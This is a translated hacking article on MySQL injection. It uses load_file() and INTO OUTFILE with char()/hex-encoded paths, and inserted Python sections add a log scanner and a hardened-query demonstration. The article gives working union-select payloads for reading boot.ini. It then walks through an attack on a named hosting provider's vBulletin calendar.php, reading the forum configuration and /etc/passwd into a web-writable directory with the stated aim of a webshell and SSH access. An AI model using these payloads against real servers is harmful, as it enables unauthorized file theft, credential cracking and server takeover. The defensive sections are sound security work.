Author: angel

Preface

My article "SQL Injection with MySQL" (in the July "Hacker Defense" special topic) gave a fairly comprehensive introduction to MySQL injection, but there is one function with a rather large hazard potential that I deliberately did not mention there, because if this function can be applied, the security of the PHP program, and even of the whole server, is greatly reduced. Since "SQL Injection with MySQL" appeared during the summer vacation, and with the many newcomers, students and morally corrupted people in mind, I left it out of that article; in fact the present article was already written in early May. After the special topic appeared, many people turned to PHP/MySQL injection research, many new techniques will be dug up, and the more advanced skills we have mastered will be published. The relatively basic material is no longer covered in this article.

Details

In a SQL statement you can use a variety of MySQL built-in functions. database(), user(), system_user(), session_user() and current_user() are often used to obtain some system information. There is one more function that is even more useful: load_file(). It reads a file and returns the file contents as a string. Seeing this, you should already be thinking about what can be done with it: simply read some confidential files. But there are conditions: the file must be on the server, the full path must be given, the MySQL user must have permission to read files, the file must be readable in full, and the file must be smaller than max_allowed_packet. If the file does not exist, or cannot be read for any of the reasons above, the function returns NULL (empty). The hardest part is permission: on Windows, if NTFS permissions are set properly, the relevant file cannot be read; when you encounter a file that only Administrators can access, the user cannot get it out.
In actual injection there are two difficulties to resolve: obtaining the absolute physical path, and constructing a valid malformed statement. In many PHP programs, when an erroneous query is submitted and display_errors = On, the program exposes the absolute path of the web directory. Once the path is known, for an injectable PHP program the security of the entire server is seriously threatened. Constructing the statement is a small matter. Assume a program's SQL statement is:

Select * from article where articleid = $ID

Note: current conditions: magic_quotes_gpc = Off, C:/boot.ini readable.

At this point we construct $ID as:

-1 union select 1,1,1,1,load_file('c:/boot.ini')

Our query becomes:

Select * from article where articleid = -1 union select 1,1,1,1,load_file('c:/boot.ini')

and the program displays the contents of C:/boot.ini. But nowadays magic_quotes_gpc = Off is rare, so how do we construct a statement that contains no quotes at all? Friends who have read "SQL Injection with MySQL" will know: use the char() function, or convert the string to hexadecimal. That is exactly it.
Note: current conditions: magic_quotes_gpc = On, C:/boot.ini readable.

We construct $ID as:

-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

char(99,58,47,98,111,111,116,46,105,110,105) is the ASCII code of "c:/boot.ini". Our query becomes:

Select * from article where articleid = -1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

and we again successfully read the boot.ini file. We can also convert the string to hexadecimal: "c:/boot.ini" in hex is 0x633A2F626F6F742E696E69, so the statement above can also be written as:

Select * from article where articleid = -1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)

This is shorter, and people like it. You can type the following query into phpMyAdmin or at the mysql> prompt and study it at leisure:

SELECT LOAD_FILE([string])

Of course, in practice, for various reasons the file contents may not be displayed; we can also export files with INTO OUTFILE. Everyone already knows how to use it, so I won't go into detail; an example explains everything.

Example

www.***host.cn is a well-known FreeBSD hosting provider. We will test it; because it uses the vBB forum with its calendar.php, I don't need to hunt for a vulnerability all over the site (although they are everywhere). This is a complete security test: I only obtained information and did not enter the server.
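From the defender's side, the char()/hex trick described above is also what makes these requests easy to miss in a log review, because the file path never appears in clear text. The following Python example is added here and is not from the original article: it decodes MySQL char(...) and 0x... literals in request URLs back into the strings they encode, and flags requests that use load_file, INTO OUTFILE/DUMPFILE or UNION SELECT. The access-log lines are constructed for the demo; the IP addresses, paths and the outfile name are placeholders.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines for the demo (not from the article's target site);
# the IPs, paths and the outfile name are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jul/2004:10:01:02 +0800] "GET /article.php?id=1 HTTP/1.0" 200 512
10.0.0.7 - - [12/Jul/2004:10:01:09 +0800] "GET /article.php?id=-1%20union%20select%201,1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105)) HTTP/1.0" 200 1203
10.0.0.7 - - [12/Jul/2004:10:02:14 +0800] "GET /calendar.php?action=edit&eventid=1%20union%20select%201,1,1,1,1,load_file(0x633a2f626f6f742e696e69)%20from%20user%20where%20userid=1%20into%20outfile%20'/tmp/placeholder.txt' HTTP/1.0" 200 20
"""

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
CHAR_RE = re.compile(r'\bchar\s*\(\s*([0-9\s,]+)\)', re.IGNORECASE)
HEX_RE = re.compile(r'\b0x([0-9a-fA-F]+)\b')
SUSPECT_RE = re.compile(
    r'\b(load_file|into\s+outfile|into\s+dumpfile|union\s+select)\b', re.IGNORECASE
)


def decode_mysql_literals(text):
    """Rewrite char(n,n,...) and 0x.. literals as the quoted string they encode,
    so the analyst sees the file path the request was really aiming at."""

    def char_sub(m):
        codes = [int(c) for c in "".join(m.group(1).split()).split(",") if c]
        if any(c > 255 for c in codes):
            return m.group(0)  # multi-byte char() arguments: leave untouched
        return "'" + bytes(codes).decode("latin-1") + "'"

    def hex_sub(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)  # odd length: a plain number, not a string literal
        return "'" + bytes.fromhex(digits).decode("latin-1") + "'"

    return HEX_RE.sub(hex_sub, CHAR_RE.sub(char_sub, text))


def scan_log(log_text):
    """Return one (line_number, decoded_request, keywords) tuple per suspicious request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # URL-decode first, then undo the MySQL-level encoding of string literals
        decoded = decode_mysql_literals(unquote_plus(m.group(1)))
        hits = sorted({" ".join(h.lower().split()) for h in SUSPECT_RE.findall(decoded)})
        if hits:
            findings.append((lineno, decoded, hits))
    return findings


if __name__ == "__main__":
    for lineno, request, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {hits}\n  {request}")
```

The same decoding step is useful when reading MySQL's general query log, where the char()/hex form also hides the path. On the server side, the conditions the article lists are the controls to check: the web application's MySQL account should not hold the FILE privilege at all, and on MySQL 5.1 and later secure_file_priv can confine load_file()/INTO OUTFILE to one directory or disable them.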
In the vBB root directory there is this piece of code (reconstructed here from the garbled extraction; each() is deprecated since PHP 7.2 and removed in PHP 8):

function stripslashesarray($arr) {
    // walk every entry of the array, including the global scope when called on $GLOBALS
    while (list($key, $val) = each($arr)) {
        if ($key != "templatesused" and $key != "argc" and $key != "argv") {
            if (is_string($val) and (strtoupper($key) != $key or "" == "$key")) {
                // strip the backslashes that magic_quotes_gpc added to string values
                $arr["$key"] = stripslashes($val);
            } else if (is_array($val) and ($key == 'HTTP_POST_VARS' or $key == 'HTTP_GET_VARS' or strtoupper($key) != $key)) {
                // recurse into request arrays and other lower-case array variables
                $arr["$key"] = stripslashesarray($val);
            }
        }
    }
    return $arr;
}

if (get_magic_quotes_gpc() and is_array($GLOBALS)) {
    if (isset($attachment)) {
        $GLOBALS['attachment'] = addslashes($GLOBALS['attachment']);
    }
    if (isset($avatarfile)) {
        $GLOBALS['avatarfile'] = addslashes($GLOBALS['avatarfile']);
    }
    $GLOBALS = stripslashesarray($GLOBALS);
}
set_magic_quotes_runtime(0);

If magic_quotes_gpc is on, this code removes the escaping backslash in front of all special characters. So regardless of the state of magic_quotes_gpc in php.ini, the single quotes we submit are not affected, and injection is possible. Ha ha. We know that submitting:

/calendar.php?action=edit&eventid=1 union select 1,1,1,1, userid=1

is how to obtain the username and password MD5 hash, but for special reasons it was not displayed. From my experience, though, I knew that no restrictions had been configured, so we can read files and export them into files.
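The part of this that matters most for the defender is not the stripslashes code itself but the fact that eventid and articleid are spliced into the query as unquoted numbers: in that position a backslash-escaping layer such as magic_quotes_gpc or addslashes() changes nothing, because the payload "-1 union select ..." contains no quote characters. The following Python example is added here and is not from the article or from vBulletin; it uses SQLite, which ships with Python, in place of MySQL, with a constructed toy schema mirroring the article's article and user tables and a placeholder hash, to show the vulnerable pattern beside its hardened form (integer type check plus a bound parameter).

```python
import sqlite3


def setup_db():
    """Constructed toy schema mirroring the article's 'article' and 'user' tables (in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE article(articleid INTEGER, title TEXT, body TEXT);
        CREATE TABLE user(userid INTEGER, username TEXT, password TEXT);
        INSERT INTO article VALUES (1, 'hello', 'first post');
        INSERT INTO user VALUES (1, 'admin', 'CONSTRUCTED-HASH-PLACEHOLDER');
    """)
    return conn


def addslashes(s):
    """Emulate PHP addslashes() / magic_quotes_gpc: backslash-escape quotes and backslashes.
    MySQL honours backslash escapes and SQLite does not, but that difference never comes
    into play here: the payload in the demo contains no quote characters at all."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def vulnerable_lookup(conn, raw_id):
    """The pattern from the article: escape the input, then splice it into an unquoted
    integer slot. Escaping only matters inside a quoted string, so anything that avoids
    quotes, such as '-1 union select ...', passes straight through into the statement."""
    sql = "SELECT articleid, title, body FROM article WHERE articleid = " + addslashes(raw_id)
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, raw_id):
    """Hardened form: enforce the integer type, then bind the value instead of interpolating.
    int() rejects '-1 union select ...' outright; the '?' placeholder makes the database
    treat the value as data even if a caller ever passes something else."""
    try:
        article_id = int(raw_id)
    except (TypeError, ValueError):
        return []  # not an integer: refuse rather than guess
    return conn.execute(
        "SELECT articleid, title, body FROM article WHERE articleid = ?", (article_id,)
    ).fetchall()


if __name__ == "__main__":
    db = setup_db()
    payload = "-1 union select userid, username, password from user where userid = 1"
    print("vulnerable:", vulnerable_lookup(db, payload))  # leaks the user row
    print("hardened:  ", hardened_lookup(db, payload))    # []
```

In PHP the equivalent of hardened_lookup is casting with (int) or intval() and then using a prepared statement (mysqli or PDO) with a bound parameter; escaping alone, whether from magic_quotes_gpc or addslashes(), is not a substitute for either step in a numeric context.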
Because I had earlier, without intending to, visited a file on the site containing phpinfo(), I knew the absolute path of the web directory. While browsing the site I found a download system that works by generating HTML files; if that directory had no write permission, the HTML files could not be generated. But none of that is the focus of this article. We now have the following information:

Web absolute path: /home/4ngel
Writable directory path: /home/4ngel/soft/
magic_quotes_gpc = On

Compared with host root, the forum admin is of no interest to me. We need to read the forum configuration file and /etc/passwd: knowing the MySQL connection information, we can start from there and write a webshell or other things; knowing /etc/passwd, we can crack the passwords and go in directly over SSH. The vBB forum configuration file is /home/4ngel/forum/admin/config.php; converted to ASCII codes, we submit:

calendar.php?action=edit&eventid=1 union select 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) from user where userid=1 into outfile '/home/4ngel/soft/cfg.txt'

Oh, and remember to add a WHERE condition; otherwise, if the forum is large, the exported file will be quite big.